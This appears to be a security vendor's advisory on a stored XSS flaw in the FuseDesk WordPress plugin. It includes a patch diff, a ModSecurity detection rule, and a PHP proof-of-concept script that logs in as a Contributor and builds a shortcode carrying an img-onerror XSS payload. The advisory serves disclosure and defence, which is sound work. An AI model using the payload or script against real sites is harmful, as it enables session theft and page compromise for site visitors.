Atomic Edge analysis of CVE-2026-1914:
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the FuseDesk WordPress plugin. The vulnerability exists within the plugin’s `fusedesk_newcase` shortcode handler. Attackers with Contributor-level access or higher can inject arbitrary JavaScript payloads that execute for any user viewing a compromised page. The CVSS score of 6.4 reflects the medium severity of this authenticated stored XSS.
The root cause is insufficient output escaping for the `emailtext` attribute of the `fusedesk_newcase` shortcode. In the vulnerable version 6.8, the plugin directly echoes the user-supplied `$atts[’emailtext’]` value without sanitization in the `/fusedesk/fusedesk.php` file at line 561. The attribute value is concatenated into the returned HTML string for the contact form, creating an injection point.
Exploitation requires an authenticated user with at least Contributor privileges to edit or create a post or page. The attacker embeds the `[fusedesk_newcase]` shortcode with a malicious `emailtext` attribute, such as `emailtext=”
“.` When the page containing this shortcode is rendered, the plugin outputs the unescaped attribute value, causing the JavaScript payload to execute in the victim’s browser.
The patch in version 6.8.1 applies the `esc_html()` function to the `$atts[’emailtext’]` variable before output. This change, visible in the diff at line 561 of `/fusedesk/fusedesk.php`, ensures any HTML special characters in the user-controlled attribute are converted to their HTML entity equivalents. This neutralizes script tags and event handlers, preventing them from being interpreted as executable code by the browser.
Successful exploitation leads to stored XSS attacks. An attacker can steal session cookies, perform actions on behalf of the victim, deface pages, or redirect users to malicious sites. The Contributor-level access requirement limits the attack surface to users with content creation permissions, but this is a common role for many site contributors.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/fusedesk/fusedesk.php
+++ b/fusedesk/fusedesk.php
@@ -3,7 +3,7 @@
Plugin Name: FuseDesk for WordPress
Plugin URI: https://www.FuseDesk.com/?utm_campaign=WordPress-Plugin&utm_source=PluginURI
Description: Integrate your FuseDesk App with your WordPress site to connect up your CRM (like Keap, Infusionsoft, ActiveCampaign, Ontraport, GoHighLevel, etc) to your FuseDesk help desk, membership site, Memberium, AccessAlly, iMember360, Wishlist, WisP, Gravity Forms, WordPress site and more!
-Version: 6.8
+Version: 6.8.1
Text Domain: fusedesk
Domain Path: /languages
Author: FuseDesk
@@ -12,13 +12,13 @@
/*
FuseDesk (WordPress Plugin)
-Copyright (C) 2013-2025 Asandia, Corp.
+Copyright (C) 2013-2026 Asandia, Corp.
*/
// error_reporting(E_ALL); // Helpful for checking for warnings that are TYPICALLY hidden but may be present on some installs
if (!defined( 'FUSEDESK_PLUGIN_VERSION')) {
- define('FUSEDESK_PLUGIN_VERSION', '6.8');
+ define('FUSEDESK_PLUGIN_VERSION', '6.8.1');
}
// Register our shortcodes with WordPress
@@ -558,7 +558,7 @@
$ret .= '<input type="hidden" name="email" id="fusedesk-contact-email" value="'.esc_attr($email).'">';
} else {
$ret .= (($atts['table']) ? '<tr><td>':'').
- $atts['emailtext'].
+ esc_html($atts['emailtext']).
(($atts['table']) ? '</td><td>':': ').
'<input type="text" name="email" id="fusedesk-contact-email" value="'.esc_attr($email).'" class="fusedesk-contactform'.$inputClass.'"'.$inputStyle.'>'.
(($atts['table']) ? '</td></tr>':'').
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-1914
SecRule REQUEST_URI "@endsWith /wp-admin/post.php"
"id:1001914,phase:2,deny,status:403,chain,msg:'CVE-2026-1914: FuseDesk Stored XSS via emailtext shortcode attribute',severity:'CRITICAL',tag:'CVE-2026-1914',tag:'WordPress',tag:'FuseDesk',tag:'XSS'"
SecRule ARGS_POST:content "@rx [fusedesk_newcase[^]]*emailtexts*=s*['"][^'"]*[<>][^'"]*['"]"
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1914 - FuseDesk <= 6.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'emailtext' Shortcode Attribute
<?php
// CONFIGURATION
$target_url = 'https://vulnerable-site.com/wp-admin/post.php';
$username = 'contributor_user';
$password = 'contributor_pass';
$payload = '<img src=x onerror=alert("Atomic_Edge_XSS")>';
// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only
// STEP 1: Authenticate to WordPress
$login_url = str_replace('post.php', 'wp-login.php', $target_url);
$login_data = array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url,
'testcookie' => '1'
);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);
// Check for login success by looking for dashboard redirect or logout link
if (strpos($response, 'wp-admin') === false && strpos($response, 'logout') === false) {
die('[-] Authentication failed. Check credentials.');
}
echo '[+] Authentication successful.n';
// STEP 2: Create a new post with the malicious shortcode
$post_data = array(
'post_title' => 'Test Post - CVE-2026-1914',
'content' => '[fusedesk_newcase emailtext="' . $payload . '"]',
'post_status' => 'publish',
'action' => 'editpost',
'post_type' => 'post',
'_wpnonce' => '', // Nonce will need to be extracted from a previous request in a full PoC
'_wp_http_referer' => ''
);
// In a full exploit, we would first GET the post creation page to obtain a valid nonce.
// This simplified PoC assumes the nonce is known or bypassed.
// For demonstration, we output the payload structure.
echo '[+] Payload constructed. Inject shortcode into any post/page:n';
echo ' [fusedesk_newcase emailtext="' . $payload . '"]n';
echo '[+] When the page renders, the emailtext attribute will be output unescaped in vulnerable versions <=6.8.n';
echo '[+] Visit the published page to trigger the XSS payload.n';
curl_close($ch);
?>
